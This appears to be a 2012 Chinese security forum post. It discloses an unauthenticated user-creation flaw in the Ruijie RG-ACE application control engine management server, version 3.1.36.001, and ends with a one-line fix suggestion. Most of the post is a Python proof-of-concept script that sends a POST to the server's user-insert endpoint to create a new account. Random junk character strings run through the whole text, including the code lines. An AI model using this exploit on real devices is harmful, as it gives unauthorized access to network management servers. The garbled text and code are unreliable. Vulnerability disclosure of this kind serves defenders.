找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2193|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)5 ^5 ~: M7 g1 t' S0 k2 }/ ]) }

/ b/ T, f' K% y* I: W" U( z! O* Y- q" Y* G. \, \! t
测试的具体版本是
! e3 }3 C$ q9 M0 `; b3 ?产品名称: 锐捷应用控制引擎
) p" m, [4 l/ X" `+ L; P; L; E1 G+ {版本号: 3.1.36.001 TC
$ h1 }0 d; C) H$ v2 w/ ?7 }- o, i编译时间: 2011042917300 S: ^% D. n' k$ F% P4 |

: p5 R# D  y& Q+ W/ e9 M6 E# n. Y; K7 f* U# Y# \
漏洞证明:7 x) G% N" U6 k; R( v6 H7 [

8 L3 |* |# b' C6 j
! Q# Q) x- A9 N1 [9 l; D" A; O; S8 p
8 L9 _9 o0 j" g' P- |7 a5 H' c
2 _1 ~  C; ~) O# G; V) E- c
; u+ k6 E6 W2 z/ o0 E& o. Y
* D. Y; G; K) N( }执行脚本
. V3 c' Q" O  w! R3 s#! /usr/bin/env python. [1 p8 g, b# r! [* ]* V) A1 ?) L& @! e
#coding=gbk
+ i4 `& ?! A1 m3 h3 D#RG-ACE管理服务器 V3.1.36.0015 }% l4 r, C" V/ @/ d) y
import urllib2, urllib,cookielib3 B+ S4 k& Z/ S
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
1 a5 G* O3 D# A0 ^  p8 Q& q. Eopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
2 @- _- V( W2 {7 o# N, @) C) J2 copener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
0 K) L' P& n+ c3 A) h+ H: ]2 k3 `post=(("event","userManager.doInsertUserInfo"),1 Y- a1 @' C% e" k% C; r2 y
("useractionname","addButtonValue"),' |+ {3 [7 p- R
("useropermanager","userManager"),
1 k4 q/ ]& `0 r+ F; Y("userName","t"), #######账号自己加
  Q1 m* g/ z6 `, {("pwd","aaaaaa"),######密码自己加
7 b, x+ {3 ?9 ^("trueName","ad"),: O  p8 `6 u5 E& k1 `
("email",""),  o5 G( I7 O# X( B
("mobilePhone",""),7 w& y" N) t  q6 {2 X  g
("officePhone",""),
1 t9 m0 j7 z5 ]" Q5 r("addr",""),
& ~$ F+ N& `- s: |& q) j("submit","确定"))
# R5 U  M/ u( Q' Q" B1 j8 Zurllib2.install_opener(opener)
2 Q9 L0 y0 o/ a9 h2 _5 cp=urllib2.urlopen(url, urllib.urlencode(post)).read()4 @5 Z" E& J: Q
print "Done", a# O: c+ [5 X2 J" h) q& ], u

6 S: a& t9 G4 c9 v9 p; _& E9 Z/ _( ^) B登录,连接设备$ v1 z3 S9 S( P

; z' {; `2 ?# x3 f( I+ U/ b' w* U
# M. m% m% U" v
  |; `0 N1 d* Z5 x9 g

" _. u( s4 e; k; [默认的管理员admin权限更大点
* y1 g; ~$ z% ~2 Z
$ ~0 f: V) I. t% a" [5 |" x( J
% T6 a7 z; X6 g/ q/ }: b- I7 f  B6 ~  v! c1 a" C

/ x2 d% H# e2 j$ T2 K# N1 A; ]9 i& Q  \9 j/ m
修复方案:
' l( w) C8 L, Q7 m4 d2 U, S+ F加强对接口的权限验证
0 n) ^/ B; ]/ L8 X" G! w1 O  v% x# \0 ~& |* T+ H9 B0 c9 o2 P$ E% @- R2 K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表